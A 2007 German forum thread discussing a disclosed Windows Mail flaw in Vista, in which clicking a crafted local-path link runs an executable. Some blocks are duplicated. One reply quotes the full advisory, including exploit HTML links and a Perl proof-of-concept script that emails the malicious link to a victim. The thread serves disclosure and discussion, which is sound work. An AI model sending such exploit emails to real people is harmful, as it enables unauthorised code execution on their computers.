Erste Lücke in Vistas Windows Mail
Der Nachfolger von Outlook Express knüpft nahtlos an dessen zweifelhaften Ruf in Sicherheitsfragen an. Bereits wenige Monate nach der offiziellen Freigabe wurde nun das erste bedenkliche Sicherheitsproblem aufgedeckt: Unter bestimmten Umständen kann ein einfacher Klick auf eine URL dazu führen, dass auf dem lokalen Rechner ein Programm gestartet wird.
Anzeige
Ein Hacker mit dem Pseudonym Kingcope berichtete auf einer Sicherheits-Mailingliste, dass es dazu genügt, in eine Mail einen Link mit einem Verweis auf ein lokales Programm einzubetten. Wenn ein Ordner mit dem gleichen Namen wie das ausführbare Programm existiert, führt Vista Mail bei einem Klick auf den Link das Programm ohne Nachfrage aus. In einem kurzen Eigenversuch konnte heise Security diese Darstellung bestätigen: Nachdem in C:\Windows\System32\ ein Ordner namens calc angelegt wurde, startete ein Klick auf den Link zu c:/windows/system32/calc? den Taschenrechner ohne weitere Nachfrage.
Vollständger Artikel und Quelle
Seite 1 von 1
Erste Lücke In Vistas Windows Mail
Anzeige
#2
geschrieben 25. März 2007 - 13:37
hm warum wunderts mich nicht dass diese news von dir "kommt"....naja ich sag dazu nur
http://winfuture.de/news,30782.html
http://winfuture.de/news,30782.html
#3
geschrieben 25. März 2007 - 14:12
Warum wundert es mich nicht, das Du dies "bemängelst"...
Ich frage mich warum Du auf eine "Studie" verweist, die fern jeder Realität ist da:
- sie von Microsoft selbst stammt
- keine Angaben gemacht werden was genau die "Studie" beinhaltet
- Äpfel mit Birnen verglichen werden
- bei Ubuntu sind alle Lücken bereits geschlossen, während bei Vista laut Secunia noch 67% offen sind
Ich frage mich warum Du auf eine "Studie" verweist, die fern jeder Realität ist da:
- sie von Microsoft selbst stammt
- keine Angaben gemacht werden was genau die "Studie" beinhaltet
- Äpfel mit Birnen verglichen werden
- bei Ubuntu sind alle Lücken bereits geschlossen, während bei Vista laut Secunia noch 67% offen sind
Dieser Beitrag wurde von Großer bearbeitet: 25. März 2007 - 14:25
#4
geschrieben 25. März 2007 - 14:21
Fragt sich nur in wieweit das nun tatsächlich ein Problem werden könnte, sicherheitsrelevante Programme oder auch systemnahe Programme können eh nicht so ohne weiteres gestartet werden.
#5
geschrieben 25. März 2007 - 16:39
Benutzer von Vista können sich ja selbst ein Bild machen,
ich zitiere hier mal den
Vista Windows Mail Proof of Concept Exploit:
Quelle:
http://archives.neohapsis.com/archives/ful...07-03/0344.html
Gruß, Internetkopfgeldjäger
ich zitiere hier mal den
Vista Windows Mail Proof of Concept Exploit:
Zitat
Vulnerability
Remote Code Execution is possible if a user clicks on a malicious prepared link.
Vistas Mail Client will execute any executable file if a folder exists with the same name.
For example the victim has a folder in C:\ named blah and a batch script named blah.bat
also in C:\. Now if the victim clicks on a link in the email message with the URL target
set to C:\blah the batch script is executed without even asking.
There is for example a CMD script by default in C:\Windows\System32\ named winrm.cmd
(and also a folder named winrm inside System32).
Exploit:
Send a HTML email message containing the URL:
<a href="c:/windows/system32/winrm?">Click here!</a>
or
<a href="c:/windows/system32/migwiz?">Click here!</a>
and winrm.cmd/migwiz.exe gets executed without asking for permission.
These are just examples.
I could not pass arguments to winrm (hehe this would be beautiful), but I guess there
are several attack vectors.
Proof of Concept
---snip---
use Net::SMTP_auth;
$smtp = Net::SMTP_auth->new('smtp.1und1.de', Debug => 1);
$smtp->auth('PLAIN', 'username', 'password');
$smtp->mail("attacker\attacker.com");
$smtp->to("victim\victim.com");
$msg = "Subject: Vista Remote Code Exec\r\n"
."From: attacker\attacker.com\r\n"
."To: victim\victim.com\r\n"
."MIME-Version: 1.0\r\n"
."Content-Type: text/html\r\n\r\n<a href=\"c:/windows/system32/winrm?\">Click here!</a>";
$smtp->data();
$smtp->datasend("$msg\n");
$smtp->dataend();
$smtp->quit;
Remote Code Execution is possible if a user clicks on a malicious prepared link.
Vistas Mail Client will execute any executable file if a folder exists with the same name.
For example the victim has a folder in C:\ named blah and a batch script named blah.bat
also in C:\. Now if the victim clicks on a link in the email message with the URL target
set to C:\blah the batch script is executed without even asking.
There is for example a CMD script by default in C:\Windows\System32\ named winrm.cmd
(and also a folder named winrm inside System32).
Exploit:
Send a HTML email message containing the URL:
<a href="c:/windows/system32/winrm?">Click here!</a>
or
<a href="c:/windows/system32/migwiz?">Click here!</a>
and winrm.cmd/migwiz.exe gets executed without asking for permission.
These are just examples.
I could not pass arguments to winrm (hehe this would be beautiful), but I guess there
are several attack vectors.
Proof of Concept
---snip---
use Net::SMTP_auth;
$smtp = Net::SMTP_auth->new('smtp.1und1.de', Debug => 1);
$smtp->auth('PLAIN', 'username', 'password');
$smtp->mail("attacker\attacker.com");
$smtp->to("victim\victim.com");
$msg = "Subject: Vista Remote Code Exec\r\n"
."From: attacker\attacker.com\r\n"
."To: victim\victim.com\r\n"
."MIME-Version: 1.0\r\n"
."Content-Type: text/html\r\n\r\n<a href=\"c:/windows/system32/winrm?\">Click here!</a>";
$smtp->data();
$smtp->datasend("$msg\n");
$smtp->dataend();
$smtp->quit;
Quelle:
http://archives.neohapsis.com/archives/ful...07-03/0344.html
Gruß, Internetkopfgeldjäger
#6
geschrieben 25. März 2007 - 16:47
e-hahn sagte:
Fragt sich nur in wieweit das nun tatsächlich ein Problem werden könnte, sicherheitsrelevante Programme oder auch systemnahe Programme können eh nicht so ohne weiteres gestartet werden.
Ich denke dabei mal an Programme im Windows Mail-Cache
Dieser Beitrag wurde von Graumagier bearbeitet: 25. März 2007 - 16:47
"If you make something idiot proof, someone will invent a better idiot." - Marvin
For Emails always use OpenPGP. My KeyID: 0xA1E011A4
For Emails always use OpenPGP. My KeyID: 0xA1E011A4
Thema verteilen:
Seite 1 von 1